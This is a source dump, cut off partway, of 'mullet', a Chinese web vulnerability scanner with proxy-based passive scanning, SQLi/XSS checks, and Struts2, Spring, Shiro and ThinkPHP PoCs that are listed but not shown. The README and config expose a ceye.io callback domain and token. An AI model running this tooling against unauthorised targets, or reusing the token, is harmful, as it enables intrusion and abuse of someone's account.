├── .gitignore
├── README.md
├── api.py
├── config
├── config.ini
└── report_template.html
├── imgs
├── api.jpg
├── sqli.jpg
├── 主动扫描.jpg
├── 主动扫描1.jpg
├── 主动扫描2.jpg
├── 使用.jpg
├── 报告.jpg
└── 被动扫描.jpg
├── lib
├── cmd_parser.py
├── controller.py
├── data.py
├── filter.py
├── html_parser.py
├── http_parser.py
├── jscontext.py
├── log.py
├── proxy.py
├── rate.py
├── reverse.py
├── utils.py
└── work.py
├── main.py
├── plugins
├── fingerprint
│ ├── fingerprint.py
│ └── scripts
│ │ ├── base.py
│ │ └── framework
│ │ ├── django.py
│ │ ├── fp_flask.py
│ │ ├── shiro.py
│ │ ├── springboot.py
│ │ ├── struts2.py
│ │ └── thinkphp.py
├── general
│ ├── general.py
│ └── scripts
│ │ ├── js_sensitive.py
│ │ ├── jsonp.py
│ │ ├── sqli.py
│ │ ├── sqli
│ │ ├── boolean_blind.xml
│ │ ├── boundaries.xml
│ │ ├── error_based.xml
│ │ ├── errors.xml
│ │ └── time_blind.xml
│ │ └── xss.py
├── poc
│ ├── base.py
│ ├── poc_scan.py
│ └── pocs
│ │ ├── shiro
│ │ └── shiro_default_key.py
│ │ ├── spring
│ │ ├── CVE-2022-22947.py
│ │ └── spring_0daya.py
│ │ ├── struts2
│ │ ├── s2_057.py
│ │ ├── s2_059.py
│ │ └── s2_061.py
│ │ └── thinkphp
│ │ └── ThinkPHP5_5_0_22.py
├── report.py
├── scan.py
└── sensitive_info
│ ├── sensitive_info.py
│ └── sensitive_info.txt
└── requirements.txt
/.gitignore:
--------------------------------------------------------------------------------
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # C extensions
7 | *.so
8 |
9 | # Distribution / packaging
10 | .Python
11 | build/
12 | develop-eggs/
13 | dist/
14 | downloads/
15 | eggs/
16 | .eggs/
17 | lib64/
18 | parts/
19 | sdist/
20 | var/
21 | wheels/
22 | pip-wheel-metadata/
23 | share/python-wheels/
24 | *.egg-info/
25 | .installed.cfg
26 | *.egg
27 | MANIFEST
28 |
29 | # PyInstaller
30 | # Usually these files are written by a python script from a template
31 | # before PyInstaller builds the exe, so as to inject date/other infos into it.
32 | *.manifest
33 | *.spec
34 |
35 | # Installer logs
36 | pip-log.txt
37 | pip-delete-this-directory.txt
38 |
39 | # Unit test / coverage reports
40 | htmlcov/
41 | .tox/
42 | .nox/
43 | .coverage
44 | .coverage.*
45 | .cache
46 | nosetests.xml
47 | coverage.xml
48 | *.cover
49 | *.py,cover
50 | .hypothesis/
51 | .pytest_cache/
52 |
53 | # Translations
54 | *.mo
55 | *.pot
56 |
57 | # Django stuff:
58 | *.log
59 | local_settings.py
60 | db.sqlite3
61 | db.sqlite3-journal
62 |
63 | # Flask stuff:
64 | instance/
65 | .webassets-cache
66 |
67 | # Scrapy stuff:
68 | .scrapy
69 |
70 | # Sphinx documentation
71 | docs/_build/
72 |
73 | # PyBuilder
74 | target/
75 |
76 | # Jupyter Notebook
77 | .ipynb_checkpoints
78 |
79 | # IPython
80 | profile_default/
81 | ipython_config.py
82 |
83 | # pyenv
84 | .python-version
85 |
86 | # pipenv
87 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
88 | # However, in case of collaboration, if having platform-specific dependencies or dependencies
89 | # having no cross-platform support, pipenv may install dependencies that don't work, or not
90 | # install all needed dependencies.
91 | #Pipfile.lock
92 |
93 | # PEP 582; used by e.g. github.com/David-OConnor/pyflow
94 | __pypackages__/
95 |
96 | # Celery stuff
97 | celerybeat-schedule
98 | celerybeat.pid
99 |
100 | # SageMath parsed files
101 | *.sage.py
102 |
103 | # Environments
104 | .env
105 | .venv
106 | env/
107 | venv/
108 | ENV/
109 | env.bak/
110 | venv.bak/
111 |
112 | # Spyder project settings
113 | .spyderproject
114 | .spyproject
115 |
116 | # Rope project settings
117 | .ropeproject
118 |
119 | # mkdocs documentation
120 | /site
121 |
122 | # mypy
123 | .mypy_cache/
124 | .dmypy.json
125 | dmypy.json
126 |
127 | # Pyre type checker
128 | .pyre/
129 | log/
130 | /venv
131 |
132 | *.db
133 | output
134 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
6 | # mullet
7 | 扫描器 梭鱼
8 | 支持主动 被动扫描的方式
9 |
10 | 被动通过 mitm 支持 所以需要安装证书
11 | `安装证书 代理开启后访问 http://mitm.it/`
12 |
13 | poc是跟指纹关联的 指纹匹配了才会发对应的poc
14 |
15 | 采用统一请求的方式 限流 所有发的请求都会被限流
16 | 内部多个插件使用多生产多消费的模式
17 |
18 |
19 | ## 安装
20 |
21 | 仅支持python3的环境
22 |
23 | ```shell
24 | git clone git@github.com:Ciyfly/mullet.git
25 | cd mullet
26 | python3 -m venv venv
27 | source venv
28 | pip install --upgrade pip
29 | pip install -r requirements.txt
30 | python main.py --help
31 | ```
32 |
33 | ## 使用
34 |
35 | 
36 |
37 | ### 主动扫描
38 | `python main.py -u "http://192.168.19.144:8080/level1.php?name=asdasdasd"`
39 |
40 | 
41 | 
42 |
43 |
44 |
45 | ### 被动扫描
46 |
47 | 默认监听`8686` 端口
48 | `python main.py`
49 |
50 | 
51 |
52 | ## 报告
53 | 输出报告是html格式的在 output目录下
54 |
55 | 
56 |
57 | ## api
58 | 支持 web 的api形式 创建扫描 默认监听`8787`端口
59 | api 会先随机生成token api需要携带toekn参数才能创建任务
60 |
61 | server `python api.py`
62 | client
63 | ```shell
64 | curl -X POST \
65 | http://192.168.19.144:8787/scan/ \
66 | -H 'content-type: application/json' \
67 | -d '{
68 | "url":"http://192.168.19.144:8080/level1.php?name=asdasdasd",
69 | "token": "ncsgaqvuliehomfk"
70 | }'
71 | ```
72 |
73 | 
74 |
75 |
76 | ## 检测
77 | 通用检测
78 |
79 | - sqli
80 | - xss
81 | - jsonp
82 |
83 | 指纹
84 |
85 | 指纹采用的是单个脚本的形式 有一些特殊情况靠配置文件或者json不好处理
86 |
87 | - shiro
88 | - struts2
89 | - thinkphp
90 |
91 | poc
92 |
93 | - shiro_default_key
94 | - spring CVE-2022-22947
95 | - s2_061
96 | - s2_059
97 | - s2_057
98 | - ThinkPHP5_5_0_22
99 |
100 |
101 | ## 配置文件
102 | 配置文件在 config/config.ini
103 | ```ini
104 | [options]
105 | ; model=debug
106 | model=info
107 | [reverse]
108 | ceye_domain=y9be3e.ceye.io
109 | ceye_token=e3764fbde6dad1a2a8fd85be90ba42c9
110 |
111 | ; 插件的开关控制
112 | [switch]
113 | fingerprint=False
114 | sensitive_info=False
115 | general=True
116 | poc=False
117 | ; 通用插件的开关
118 | [switch_general]
119 | ; list=jsfind,jsonp,sqli,xss,js_sensitive
120 | list=xss
121 |
122 | # 速率限制
123 | [rate]
124 | max_calls=10
125 | period=1
126 | # 网络请求的默认超时时间
127 | timeout=3
128 |
129 | # 白名单
130 | [white_list]
131 | list=google.com,gov.cn,googleapis.com,github.com
132 | ```
133 | ## 参考
134 | https://github.com/w-digital-scanner/w13scan/
135 | https://github.com/sqlmapproject/sqlmap
136 | https://mp.weixin.qq.com/s?__biz=MzU2NzcwNTY3Mg==&mid=2247483698&idx=1&sn=9733c6078516c34963a4c0486c6d1872&chksm=fc986815cbefe103975c2e554ef2667b931e14b2d1dcca407af9edbad83ea72f3ac88efd8d22&mpshare=1&scene=1&srcid=&sharer_sharetime=1588849508551&sharer_shareid=19604935512cdb60a84a4a498605fc8d&key=e4739a048b456af8bbf436c6fb2173754f53fcd63e766a439186e0a2433cd084a69e23876cc446623cb005c3c9fed06af918b7b082f604e7a23c136961d5a1e633f4a60b65b241dea730f7c13578ea94&ascene=1&uin=MTM3MzQ3ODE0MA%3D%3D&devicetype=Windows+10&version=62080079&lang=zh_CN&exportkey=AZ%2F8pd18PHTzKD6ytyi7PPk%3D&pass_ticket=ssxjxDrN0aRCdy2TGXV37%2Bg0cYgtEknB95Y1dXjxGOtpxjCYC6wfPOq5QXvs3lzE
137 |
138 | ## 声明
139 | 使用mullet前请遵守当地法律,mullet仅提供给教育行为使用。
140 |
--------------------------------------------------------------------------------
/api.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-03-31 16:17:16
5 | LastEditors: recar
6 | LastEditTime: 2022-03-31 17:16:02
7 | '''
8 |
9 | from flask import Flask, request, jsonify
10 | from lib.data import controller
11 | from lib.http_parser import HTTPParser
12 | from lib.utils import Utils
13 | from lib.log import logger
14 |
15 | app = Flask('mullet')
16 | TOKEN = Utils.gen_random_str(16)
17 |
18 | controller.init(block=True)
19 |
20 | @app.route('/scan/', methods=['POST'])
21 | def scan():
22 | data = request.get_json()
23 | url = data.get("url")
24 | data_token = data.get("token")
25 | if data_token is None or data_token!=TOKEN:
26 | return jsonify({
27 | "code": 201,
28 | "message": "Invalid token"
29 | })
30 | rsp, req = HTTPParser.get_res_req_by_url(url)
31 | url_info = HTTPParser.req_to_urlinfo(req)
32 | controller.run(url_info, req, rsp)
33 | return jsonify({
34 | "code": 200,
35 | "message": "Add success"
36 | })
37 |
38 | if __name__ == '__main__':
39 | logger.info("TOKEN: {0}".format(TOKEN))
40 | logger.info("Mullet api ")
41 | app.run(host='0.0.0.0', port=8787)
42 |
--------------------------------------------------------------------------------
/config/config.ini:
--------------------------------------------------------------------------------
1 | [options]
2 | ; model=debug
3 | model=info
4 | [reverse]
5 | ceye_domain=y9be3e.ceye.io
6 | ceye_token=e3764fbde6dad1a2a8fd85be90ba42c9
7 |
8 | ; 插件的开关控制
9 | [switch]
10 | ; fingerprint=True
11 | fingerprint=True
12 | sensitive_info=True
13 | general=True
14 | poc=True
15 | ; 通用插件的开关
16 | [switch_general]
17 | list=jsfind,jsonp,sqli,xss,js_sensitive
18 | ; list=xss
19 |
20 | # 速率限制
21 | [rate]
22 | max_calls=10
23 | period=1
24 | timeout=3
25 |
26 | # 白名单
27 | [white_list]
28 | list=google.com,gov.cn,googleapis.com,github.com
--------------------------------------------------------------------------------
/config/report_template.html:
--------------------------------------------------------------------------------
1 |
6 |
7 |
8 |
9 | Mullet Report
10 |
11 |
49 |
50 |
51 |
54 |
55 |
56 |
57 |
58 | plugins |
59 | payload |
60 | url |
61 | desc |
62 | req |
63 | rsp |
64 |
65 |
66 |
67 | {% for item in items %}
68 |
69 | {{item.plugins}} |
70 | {{item.payload}} |
71 | {{item.url}} |
72 | {{item.desc}} |
73 | {{item.req}} |
74 | {{item.rsp}} |
75 |
76 | {% endfor %}
77 |
78 |
79 |
80 |
--------------------------------------------------------------------------------
/imgs/api.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/api.jpg
--------------------------------------------------------------------------------
/imgs/sqli.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/sqli.jpg
--------------------------------------------------------------------------------
/imgs/主动扫描.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/主动扫描.jpg
--------------------------------------------------------------------------------
/imgs/主动扫描1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/主动扫描1.jpg
--------------------------------------------------------------------------------
/imgs/主动扫描2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/主动扫描2.jpg
--------------------------------------------------------------------------------
/imgs/使用.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/使用.jpg
--------------------------------------------------------------------------------
/imgs/报告.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/报告.jpg
--------------------------------------------------------------------------------
/imgs/被动扫描.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Ciyfly/mullet/f03ed84bb24447e88497a845b3a429621fa65670/imgs/被动扫描.jpg
--------------------------------------------------------------------------------
/lib/cmd_parser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-01-12 16:28:33
5 | LastEditors: recar
6 | LastEditTime: 2022-04-07 11:34:53
7 | '''
8 | from cmath import log
9 | from lib.data import controller
10 | from lib.http_parser import HTTPParser
11 | from lib.proxy import proxy_run
12 | from lib.log import logger
13 | import logging
14 | import click
15 | import os
16 |
17 | @click.command()
18 | @click.option('-s', 'server_addr', type=str, default="0.0.0.0:8686", help='listen server addr defalut 0.0.0.0:8686')
19 | @click.option('-v', '--violent', is_flag=True, help="violent test")
20 | @click.option('-u', '--url', type=str, help="Do it directly without using proxy mode")
21 | @click.option('-f', '--url_file', type=str, help="scan target file")
22 | @click.option('-p', '--poc', type=str, help="run poc")
23 | @click.option('--debug/--no-debug', help="log level set debug default False")
24 | def cli(server_addr, violent, url, url_file, poc, debug):
25 | # set log level
26 | if debug:
27 | logger.setLevel(logging.DEBUG)
28 | # violent 强力测试模式
29 | if violent:
30 | logger.info("开启强力测试模式")
31 | # url
32 | urls = list()
33 | if url or url_file:
34 | controller.init(block=False, violent=violent)
35 | # 主动扫描推任务到controller
36 | if url_file:
37 | if os.path.exists(url_file):
38 | with open(url_file, 'r') as f:
39 | for line in f:
40 | urls.append(line.strip())
41 | else:
42 | click.echo("url_file is not exists")
43 | click.exit()
44 | if url:
45 | urls.append(url)
46 | # 单个poc
47 | if poc:
48 | logger.info("Run Poc: {0}".format(poc))
49 | for url in urls:
50 | rsp, req = HTTPParser.get_res_req_by_url(url)
51 | if rsp is None:
52 | logger.error("{0} :不能访问".format(url))
53 | continue
54 | url_info = HTTPParser.req_to_urlinfo(req)
55 | controller.run_poc(url_info, req, rsp, poc)
56 | # scan
57 | elif not poc and urls:
58 | logger.info("mode: Scan")
59 | for url in urls:
60 | rsp, req = HTTPParser.get_res_req_by_url(url)
61 | if rsp is None and req is None:
62 | logger.error("{0} :不能访问".format(url))
63 | continue
64 | url_info = HTTPParser.req_to_urlinfo(req)
65 | controller.run(url_info, req, rsp)
66 | logger.info("end")
67 |
68 | else:
69 | logger.info("mode: Proxy")
70 | # 被动扫描
71 | controller.init(violent=violent)
72 | addr, port = server_addr.split(":")
73 | proxy_run(addr, int(port))
74 |
75 |
--------------------------------------------------------------------------------
/lib/controller.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-01-12 11:05:17
5 | LastEditors: recar
6 | LastEditTime: 2022-04-07 16:27:25
7 | '''
8 | from lib.work import Worker
9 | from plugins.report import Report
10 | from plugins.fingerprint.fingerprint import Fingerprint
11 | from plugins.sensitive_info.sensitive_info import SensitiveInfo
12 | from plugins.general.general import General
13 | from plugins.poc.poc_scan import PocScan
14 | from lib.log import logger
15 | import configparser
16 | import time
17 | import sys
18 | import os
19 |
20 |
21 |
22 | class Controller(object):
23 | def __init__(self,):
24 | self.domains = dict()
25 | self.urls = dict()
26 | self.logger = logger
27 | self.base_path = os.path.dirname(os.path.abspath(__file__))
28 | self.plugins_dir = os.path.join(self.base_path, "../", 'plugins')
29 | self.general_plugins_dir = os.path.join(self.plugins_dir, "general")
30 | self.pocs_dir = os.path.join(self.plugins_dir, "poc", "pocs")
31 |
32 | # 类注册到sys pth
33 | # 通用
34 | sys.path.append(self.general_plugins_dir)
35 | sys.path.append(self.pocs_dir)
36 | # load config
37 | self.load_config()
38 |
39 | def load_config(self):
40 | config_path = os.path.join(self.base_path, "../", "config", "config.ini")
41 | conf = configparser.ConfigParser()
42 | conf.read(config_path)
43 | self.switch_fingerprint = conf.getboolean('switch', 'fingerprint')
44 | self.switch_sensitive_info = conf.getboolean('switch', 'sensitive_info')
45 | self.switch_general = conf.getboolean('switch', 'general')
46 | self.switch_poc = conf.getboolean('switch', 'poc')
47 | # 通用插件的开启列表
48 | self.switch_general_list = conf.get('switch_general', 'list').split(",")
49 | # 白名单
50 | self.white_list = conf.get('white_list', 'list').split(",")
51 |
52 | def init(self, block=True, violent=False):
53 | self.logger.debug("Controller Init ")
54 | # 启动报告模块
55 | self.report = Report()
56 | # 阻塞状态 True的话是被动代理 False的话是主动扫描
57 | self.block = block
58 | # 是否开启强力模式
59 | self.violent=violent
60 | # 报告
61 | self.report_work = self.report.report_work
62 | # 指纹
63 | if self.switch_fingerprint:
64 | self.fingerprint_handler = Fingerprint(self.report_work, block=self.block)
65 | # 敏感信息
66 | if self.switch_sensitive_info:
67 | self.sensitiveInfo_handler = SensitiveInfo(self.report_work, block=self.block)
68 | # 通用检测模块
69 | # if self.block:
70 | if self.switch_general:
71 | self.general_plugins_handler = General(self.report_work, block=self.block)
72 | # poc 模块
73 | if self.switch_poc:
74 | self.poc_handler = PocScan(self.report_work, block=self.block)
75 |
76 |
77 | def print_task_queue(self):
78 | while True:
79 | task_info = ""
80 | for plugins, queue in self.task_queue_map.items():
81 | task_info +="|{0}:{1}|".format(plugins, queue.qsize())
82 | sys.stdout.write("\r{0}".format(task_info))
83 | sys.stdout.flush()
84 | time.sleep(0.5)
85 |
86 | # 入口分发任务
87 | def run(self, url_info, req, rsp):
88 | # 这里忽略白名单
89 | for domain in self.white_list:
90 | if domain in url_info.get('origin_url'):
91 | return
92 | domain = url_info.get('host')
93 | gener_url = url_info.get("gener_url")
94 | self.logger.debug("block: {0}".format(self.block))
95 | if domain not in self.domains:
96 | self.logger.debug("Domain: {0}".format(domain))
97 | self.domains[domain]=""
98 | # 推指纹
99 | if self.switch_fingerprint:
100 | self.logger.debug("fingerprint")
101 | self.fingerprint_handler.run(url_info, req, rsp)
102 | # 推敏感信息扫描
103 | if self.switch_sensitive_info:
104 | self.logger.debug("sensitiveInfo")
105 | self.sensitiveInfo_handler.run(url_info, req, rsp)
106 | # 被动代理模式才用通用插件
107 | # if self.block and gener_url not in self.urls:
108 | if gener_url not in self.urls:
109 | self.logger.debug("general")
110 | self.urls[gener_url]=""
111 | # 推通用插件
112 | if self.switch_general:
113 | self.logger.debug("switch_general")
114 | self.general_plugins_handler.run(url_info, req, rsp, self.switch_general_list, violent=self.violent)
115 | # 主动扫描的话阻塞任务
116 | if not self.block:
117 | if self.switch_fingerprint:
118 | while not self.fingerprint_handler.fingerprint_work.is_end():
119 | time.sleep(3)
120 | if self.switch_sensitive_info:
121 | while not self.sensitiveInfo_handler.seninfo_work.is_end():
122 | time.sleep(3)
123 | if self.switch_general:
124 | while not self.general_plugins_handler.general_work.is_end():
125 | time.sleep(3)
126 | if self.switch_poc:
127 | for result_info in self.report.result_list:
128 | plugins = result_info.plugins
129 | if plugins == "fingerprint":
130 | payload = result_info.payload
131 | self.logger.debug("fingerprint: {0} ->poc".format(payload))
132 | self.poc_handler.run(url_info, req, rsp, payload)
133 | if self.switch_poc and self.switch_fingerprint:
134 | if hasattr(self.poc_handler, "poc_work"):
135 | while not self.poc_handler.poc_work.is_end():
136 | time.sleep(3)
137 | return
138 |
139 | def run_poc(self, url_info, req, rsp, poc_name):
140 | self.poc_handler.run_poc_by_name(url_info, req, rsp, poc_name)
141 | self.logger.info("poc run over")
142 |
--------------------------------------------------------------------------------
/lib/data.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-01-14 15:23:56
5 | LastEditors: recar
6 | LastEditTime: 2022-03-21 15:53:47
7 | '''
8 | from lib.controller import Controller
9 | controller = Controller()
10 |
--------------------------------------------------------------------------------
/lib/filter.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2021-03-23 15:51:56
5 | LastEditors: recar
6 | LastEditTime: 2022-03-29 14:40:57
7 | '''
8 | from lib.http_parser import HTTPParser
9 | from lib.data import controller
10 | from lib.log import logger
11 | import sys
12 | sys.path.append('../')
13 |
14 | class Filter(object):
15 | @staticmethod
16 | def parser_request(flow):
17 | del flow.request.headers['Accept-Encoding']
18 |
19 | @staticmethod
20 | def parser_response(flow):
21 | url_info = HTTPParser.flow_to_urlinfo(flow)
22 | req = HTTPParser.flow_to_req(flow)
23 | rsp = HTTPParser.flow_to_rsp(flow)
24 | # check
25 | if not url_info:
26 | return
27 | logger.debug("[*] url: {0} type: {1}".format(url_info["url"], url_info['type']))
28 | # 过滤白名单
29 | # insert url
30 | controller.run(url_info, req, rsp)
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/lib/html_parser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # -*- coding: utf-8 -*-
3 | # @Time : 2020/4/8 10:07 AM
4 | # @Author : w8ay
5 | # @File : htmlparser.py
6 | import random
7 | from abc import ABC
8 |
9 | from html.parser import HTMLParser
10 |
11 | import pyjsparser
12 |
13 | from lib.jscontext import analyse_js
14 |
15 |
16 | def random_upper(text: str):
17 | '''
18 | 将文本随机大写翻转
19 | :param text:
20 | :return:
21 | '''
22 | length = len(text)
23 | for i in range(length // 2):
24 | rand = random.randint(0, length - 1)
25 | while text[rand].isupper():
26 | rand = random.randint(0, length - 1)
27 | temp = text[rand].upper()
28 | text = text[0:rand] + temp + text[rand + 1:]
29 | return text
30 |
31 |
32 | class MyHTMLParser(HTMLParser, ABC):
33 | def __init__(self):
34 | super().__init__()
35 | self.tree = []
36 | self.tokenizer = []
37 | self.root = None
38 | temp = {
39 | "tagname": "",
40 | "content": "",
41 | "attibutes": []
42 | }
43 |
44 | def handle_starttag(self, tag, attrs):
45 | if len(self.tree) == 0:
46 | self.root = tag
47 | self.tree.append(
48 | {
49 | "tagname": tag,
50 | "content": "",
51 | "attibutes": attrs
52 | }
53 | )
54 |
55 | def handle_endtag(self, tag):
56 | if len(self.tree) > 0:
57 | r = self.tree.pop()
58 | self.tokenizer.append(r)
59 |
60 | def handle_startendtag(self, tag, attrs):
61 | self.handle_starttag(tag, attrs)
62 | self.handle_endtag(tag)
63 |
64 | def handle_data(self, data):
65 | if self.tree:
66 | self.tree[-1]["content"] += data
67 |
68 | def handle_comment(self, data):
69 | self.tokenizer.append({
70 | "tagname": "#comment",
71 | "content": data,
72 | "attibutes": []
73 | })
74 |
75 | def getTokenizer(self):
76 | while len(self.tree):
77 | r = self.tree.pop()
78 | self.tokenizer.append(r)
79 | return self.tokenizer
80 |
81 |
82 | def getParamsFromHtml(html):
83 | parse = MyHTMLParser()
84 | parse.feed(html)
85 | tokens = parse.getTokenizer()
86 | result = set()
87 | for token in tokens:
88 | tagname = token["tagname"].lower()
89 | if tagname == "input":
90 | for attibute in token["attibutes"]:
91 | key, value = attibute
92 | if key == "name":
93 | result.add(value)
94 | break
95 | elif tagname == "script":
96 | content = token["content"]
97 | try:
98 | nodes = pyjsparser.parse(content).get("body", [])
99 | except pyjsparser.pyjsparserdata.JsSyntaxError as e:
100 | return []
101 | result |=set(analyse_js(nodes))
102 | return list(result)
103 |
104 |
105 | def SearchInputInResponse(input, body):
106 | parse = MyHTMLParser()
107 | parse.feed(body)
108 | tokens = parse.getTokenizer()
109 | index = 0
110 | occurences = []
111 | for token in tokens:
112 | tagname = token["tagname"]
113 | content = token["content"]
114 | attibutes = token["attibutes"]
115 | _input = input
116 | origin_length = len(occurences)
117 |
118 | if _input in tagname:
119 | occurences.append({
120 | "type": "intag",
121 | "position": index,
122 | "details": token,
123 | })
124 | elif input in content:
125 | if tagname == "#comment":
126 | occurences.append({
127 | "type": "comment",
128 | "position": index,
129 | "details": token,
130 | })
131 | elif tagname == "script":
132 | occurences.append({
133 | "type": "script",
134 | "position": index,
135 | "details": token,
136 | })
137 | elif tagname == "style":
138 | occurences.append({
139 | "type": "html",
140 | "position": index,
141 | "details": token,
142 | })
143 | else:
144 | occurences.append({
145 | "type": "html",
146 | "position": index,
147 | "details": token,
148 | })
149 | else:
150 | # 判断是在name还是value上
151 | for k, v in attibutes:
152 | content = None
153 | if _input in k:
154 | content = "key"
155 | elif v and _input in v:
156 | content = "value"
157 |
158 | if content:
159 | occurences.append({
160 | "type": "attibute",
161 | "position": index,
162 | "details": {"tagname": tagname, "content": content, "attibutes": [(k, v)]},
163 | })
164 | if len(occurences) > origin_length:
165 | index += 1
166 | return occurences
167 |
--------------------------------------------------------------------------------
/lib/http_parser.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 | # coding=utf-8
3 | '''
4 | Date: 2022-01-14 11:29:39
5 | LastEditors: recar
6 | LastEditTime: 2022-04-07 11:40:59
7 | '''
8 | from urllib.parse import unquote
9 | from urllib.parse import urlparse, parse_qs
10 | from lib.utils import Utils
11 | from lib.log import logger
12 | import traceback
13 | import requests
14 |
15 | http_version_map = {
16 | 10: "HTTP/1.0",
17 | 11: "HTTP/1.1"
18 | }
19 |
20 | class HTTPParser(object):
21 |
22 | @staticmethod
23 | def flow_to_urlinfo(flow):
24 | url_info = dict()
25 | url = flow.request.url
26 | url = unquote(url, 'utf-8')
27 | url_suffix = Utils.get_url_suffix(url)
28 | if url_suffix not in [
29 | "png", "css", "jpg", "svg",
30 | "ttf", "eot", "eot", "woff2", "gif",
31 | "bmp" "svg", "less", "sass", "scss", "ico",
32 | "woff", "md"]:
33 | if url_suffix == "js":
34 | url_info["type"] = "js"
35 | elif url_suffix in ["jsp", "php", "asp", "aspx"]:
36 | url_info["type"] = url_suffix
37 | else:
38 | url_info["type"] = "dynamic"
39 | gener_url = Utils.generalization(url)
40 | url_info["gener_url"] = gener_url
41 | url_info["url"] = url
42 | url_info["origin_url"] = url
43 | # url parse
44 | parse_url = urlparse(url)
45 | url_info["path"] = parse_url.path
46 | url_info["params"] = parse_url.params
47 | url_info["query"] = parse_url.query
48 | url_info["method"] = flow.request.method
49 | url_info["data"] = flow.request.text
50 | url_info["headers"] = flow.request.headers
51 | url_info["json"] = False
52 | req_type = flow.request.headers.get("Content-Type")
53 | if "application/json"==req_type:
54 | url_info["json"] = True
55 | if url_info["method"]=="GET":
56 | url_info["query_dict"] = parse_qs(parse_url.query)
57 | elif url_info["method"]=="POST":
58 | url_info["query_dict"] = parse_qs(url_info["data"])
59 | url_info["host"] = flow.request.host
60 | url_info["server_port"] = flow.server_conn.ip_address[1]
61 | url_info["server_ip"] = flow.server_conn.ip_address[0]
62 | if "https" in url:
63 | url_info["ssl"] = True
64 | url_info["base_url"] = "https://{0}:{1}".format(url_info["server_ip"], url_info["server_port"])
65 | else:
66 | url_info["ssl"] = False
67 | url_info["base_url"] = "http://{0}:{1}".format(url_info["server_ip"], url_info["server_port"])
68 |
69 |
70 | return url_info
71 |
72 |
73 | @staticmethod
74 | def req_to_urlinfo(req):
75 | url_info = dict()
76 | url = req.get('url')
77 | url = unquote(url, 'utf-8')
78 | url_info["origin_url"] = url
79 | url_info["method"] = 'GET'
80 | url_info["url"] = url
81 | parse_url = urlparse(url)
82 | url_info["path"] = parse_url.path
83 | url_info["params"] = parse_url.params
84 | url_info["query"] = parse_url.query
85 | url_info["host"] = parse_url.netloc
86 | url_info["query_dict"] = parse_qs(parse_url.query)
87 | if ":" in url_info["host"]:
88 | url_info["ip"] = url_info["host"].split(":")[0]
89 | url_info["port"] = url_info["host"].split(":")[1]
90 | if "https" in url:
91 | url_info["ssl"] = True
92 | url_info["base_url"] = "https://{0}".format(url_info["host"])
93 | if ":" not in url_info["host"]:
94 | url_info["port"] = 443
95 | else:
96 | url_info["ssl"] = False
97 | url_info["base_url"] = "http://{0}".format(url_info["host"])
98 | if ":" not in url_info["host"]:
99 | url_info["port"] = url_info["80"]
100 | url_suffix = Utils.get_url_suffix(url)
101 | if url_suffix not in [
102 | "png", "css", "jpg", "svg",
103 | "ttf", "eot", "eot", "woff2", "gif",
104 | "bmp" "svg", "less", "sass", "scss", "ico",
105 | "woff", "md"]:
106 | if url_suffix == "js":
107 | url_info["type"] = "js"
108 | elif url_suffix in ["jsp", "php", "asp", "aspx"]:
109 | url_info["type"] = url_suffix
110 | else:
111 | url_info["type"] = "dynamic"
112 | gener_url = Utils.generalization(url)
113 | url_info["gener_url"] = gener_url
114 |
115 | return url_info
116 |
117 | @staticmethod
118 | def flow_to_req(flow):
119 | def raw(request):
120 | req_data = '%s %s %s\r\n' % (str(request.method), str(request.path), str(request.http_version))
121 | # Add headers to the request
122 | for k, v in request.headers.items():
123 | req_data += k + ': ' + v + '\r\n'
124 | req_data += '\r\n'
125 | req_data += str(request.raw_content)
126 | return req_data
127 | req = dict()
128 | req["host"] = flow.request.host
129 | req["method"] = flow.request.method
130 | req["scheme"] = flow.request.scheme
131 | req["authority"] = flow.request.authority
132 | req["path"] = flow.request.path
133 | req["http_version"] = flow.request.http_version
134 | req["headers"] = flow.request.headers
135 | req["text"] = str(flow.request.content)
136 | req["timestamp_start"] = flow.request.timestamp_start
137 | req["timestamp_end"] = flow.request.timestamp_end
138 | req["raw"] = raw(flow.request)
139 | return req
140 |
141 | @staticmethod
142 | def flow_to_rsp(flow):
143 | rsp = dict()
144 | rsp["status_code"] = flow.response.status_code
145 | rsp["reason"] = flow.response.reason
146 | rsp["headers"] = flow.response.headers
147 | rsp["text"] = str(flow.response.content.decode('utf-8', 'ignore'))
148 | rsp["timestamp_start"] = flow.response.timestamp_start
149 | rsp["timestamp_end"] = flow.response.timestamp_end
150 | return rsp
151 |
152 | @staticmethod
153 | def rsp_to_reqtext(rsp):
154 | req = rsp.request
155 | req_data = '%s %s %s\r\n' % (str(req.method), str(req.path_url), str(http_version_map[rsp.raw.version]))
156 | # Add headers to the request
157 | for k, v in req.headers.items():
